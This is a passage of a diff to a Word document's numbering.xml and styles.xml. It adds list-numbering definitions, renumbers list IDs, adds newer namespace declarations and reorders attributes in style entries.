xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="01DF6A3B"/>
     <w:multiLevelType w:val="multilevel"/>
@@ -3026,6 +3743,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="13AC1B6E"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="80A0183A"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="15616AA0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FFFFFFFF"/>
@@ -3138,7 +3941,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="32278EBB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FFFFFFFF"/>
@@ -3251,7 +4054,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3D4EC723"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FFFFFFFF"/>
@@ -3276,7 +4079,7 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
         <w:u w:val="none"/>
       </w:rPr>
     </w:lvl>
@@ -3365,7 +4168,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3DE8CE45"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FFFFFFFF"/>
@@ -3478,7 +4281,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4AC64A29"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FFFFFFFF"/>
@@ -3591,7 +4394,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4F06F3DD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FFFFFFFF"/>
@@ -3677,7 +4480,93 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="50AF6FCD"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="51AA58EE"/>
+    <w:lvl w:ilvl="0" w:tplc="2646A308">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="DA3604DE">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="F4B0B41E">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="5AFC0700">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="FE92E698">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="E2BC0B12">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="2092C6F0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="88F4931C">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0D524A8E">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7A083991"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FFFFFFFF"/>
@@ -3790,45 +4679,45 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="10">
+  <w:num w:numId="1" w16cid:durableId="864638460">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="1055741378">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1588879752">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="138426180">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="139619780">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="291441963">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="972557608">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="1975793300">
     <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="9">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
-  <w:num w:numId="1" w16cid:durableId="1588879752">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
-  <w:num w:numId="2" w16cid:durableId="138426180">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
-  <w:num w:numId="3" w16cid:durableId="139619780">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="4" w16cid:durableId="291441963">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:num w:numId="5" w16cid:durableId="972557608">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="6" w16cid:durableId="1975793300">
-    <w:abstractNumId w:val="7"/>
-  </w:num>
-  <w:num w:numId="7" w16cid:durableId="1464537224">
+  <w:num w:numId="9" w16cid:durableId="1464537224">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="8" w16cid:durableId="1409959620">
-    <w:abstractNumId w:val="4"/>
+  <w:num w:numId="10" w16cid:durableId="1409959620">
+    <w:abstractNumId w:val="5"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
-        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
+        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         <w:sz w:val="22"/>
         <w:szCs w:val="22"/>
         <w:lang w:val="en" w:eastAsia="ja-JP" w:bidi="ar-SA"/>
@@ -3843,14 +4732,14 @@
   <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -3860,22 +4749,22 @@
     <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -3906,7 +4795,7 @@
     <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
     <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -4106,8 +4995,8 @@
     <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
     <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
     <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
     <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
     <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
@@ -4218,7 +5107,7 @@
     <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
-  <w:style w:type="paragraph" w:styleId="Normal" w:default="1">
+  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
@@ -4335,13 +5224,13 @@
       <w:color w:val="666666"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="DefaultParagraphFont" w:default="1">
+  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
-  <w:style w:type="table" w:styleId="TableNormal" w:default="1">
+  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
     <w:name w:val="Normal Table"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -4356,7 +5245,7 @@
       </w:tblCellMar>
     </w:tblPr>
   </w:style>
-  <w:style w:type="numbering" w:styleId="NoList" w:default="1">
+  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
     <w:name w:val="No List"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -4415,16 +5304,16 @@
     </w:pPr>
     <w:tblPr>
       <w:tblBorders>
-        <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
-        <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
-        <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
-        <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
-        <w:insideH w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
-        <w:insideV w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
       </w:tblBorders>
     </w:tblPr>
   </w:style>
-  <w:style w:type="character" w:styleId="HeaderChar" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
     <w:name w:val="Header Char"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Header"/>
@@ -4444,7 +5333,7 @@
       <w:spacing w:line="240" w:lineRule="auto"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="character" w:styleId="FooterChar" w:customStyle="1">
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
     <w:name w:val="Footer Char"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Footer"/>
